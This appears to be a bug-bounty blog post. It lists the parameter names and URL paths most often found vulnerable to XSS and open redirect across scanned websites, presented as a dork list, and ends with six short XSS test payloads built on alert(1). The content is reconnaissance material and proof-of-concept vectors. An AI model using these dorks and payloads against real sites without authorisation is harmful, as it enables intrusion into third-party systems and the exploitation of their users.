Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First here is the list of most vulnerable parameters along with their frequency.

Dork Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same but with corresponding path :

Dork Frequency
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂

Best XSS Vectors

Here’s a small #XSS list for manual testing (main cases, high success rate).

 "><img src onerror=alert(1)> 
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on: – URL query, fragment & path; – all input fields.

From BruteLogic Twitter account : https://twitter.com/brutelogic